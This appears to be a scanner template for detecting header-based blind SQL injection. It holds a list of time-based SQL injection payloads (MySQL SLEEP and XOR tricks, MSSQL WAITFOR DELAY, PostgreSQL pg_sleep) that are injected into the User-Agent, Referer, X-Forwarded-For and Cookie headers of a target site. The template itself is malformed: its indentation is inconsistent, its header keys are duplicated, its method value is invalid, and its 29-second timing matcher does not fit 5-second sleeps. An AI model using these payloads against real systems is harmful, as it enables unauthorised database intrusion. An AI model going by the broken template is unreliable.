id: blind-sqli

info:
  name: Header Blind SQL Injection
  author: 0xpugal
  severity: high
  metadata:
    max-request: 48
  tags: sqli

http:
  - method: GET, POST
    path:
      - "{{BaseURL}}"
    headers:
		User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))OR'"
		User-Agent: "if(now()=sysdate(),sleep(5),0)"
		User-Agent: "'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z"
		User-Agent: "(select(0)from(select(sleep(5)))v)/*%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+ \"*/"
		User-Agent: "1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='"
		User-Agent: "1'XOR(if(now()=sysdate(),sleep(5),0))OR'"
		User-Agent: "1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-1337"
		User-Agent: "1 or sleep(5)#"
		User-Agent: "' WAITFOR DELAY '0:0:5'--"
		User-Agent: "%';SELECT PG_SLEEP(5)--"
		User-Agent: "pg_sleep(5)"
		User-Agent: "'| |pg_sleep(5)--"
		Referer: "XOR(if(now()=sysdate(),sleep(5),0))OR'"
		Referer: "if(now()=sysdate(),sleep(5),0)"
		Referer: "(select(0)from(select(sleep(5)))v)/*%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+\"*/"
		Referer: "'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z"
		Referer: "1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='"
		Referer: "1'XOR(if(now()=sysdate(),sleep(5),0))OR'"
		Referer: "1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-1337"
		Referer: "1 or sleep(5)#"
		Referer: "' WAITFOR DELAY '0:0:5'--"
		Referer: "%';SELECT PG_SLEEP(5)--"
		Referer: "pg_sleep(5)"
		Referer: "'| |pg_sleep(5)--"
		X-Forwarded-For: "XOR(if(now()=sysdate(),sleep(5),0))OR'"
		X-Forwarded-For: "if(now()=sysdate(),sleep(5),0)"
		X-Forwarded-For: "(select(0)from(select(sleep(5)))v)/*' +(select(3)from(select(sleep(5)))v)+ '\" +(select(0)from(select(sleep(5)))v)+ \"*/"
		X-Forwarded-For: "'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z"
		X-Forwarded-For: "1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='"
		X-Forwarded-For: "1'XOR(if(now()=sysdate(),sleep(5),0))OR'"
		X-Forwarded-For: "1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-1337"
		X-Forwarded-For: "1 or sleep(5)#"
		X-Forwarded-For: "' WAITFOR DELAY '0:0:5'--"
		X-Forwarded-For: "%';SELECT PG_SLEEP(5)--"
		X-Forwarded-For: "pg_sleep(5)"
		X-Forwarded-For: "'| |pg_sleep(5)--"
  		Cookie: "XOR(if(now()=sysdate(),sleep(5),0))OR'"
		Cookie: "if(now()=sysdate(),sleep(5),0)"
		Cookie: "(select(0)from(select(sleep(5)))v)/*' +(select(3)from(select(sleep(5)))v)+ '\" +(select(0)from(select(sleep(5)))v)+ \"*/"
		Cookie: "'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z"
		Cookie: "1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='"
		Cookie: "1'XOR(if(now()=sysdate(),sleep(5),0))OR'"
		Cookie: "1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-1337"
		Cookie: "1 or sleep(5)#"
		Cookie: "' WAITFOR DELAY '0:0:5'--"
		Cookie: "%';SELECT PG_SLEEP(5)--"
		Cookie: "pg_sleep(5)"
		Cookie: "'| |pg_sleep(5)--"
		
	stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'duration>=29'
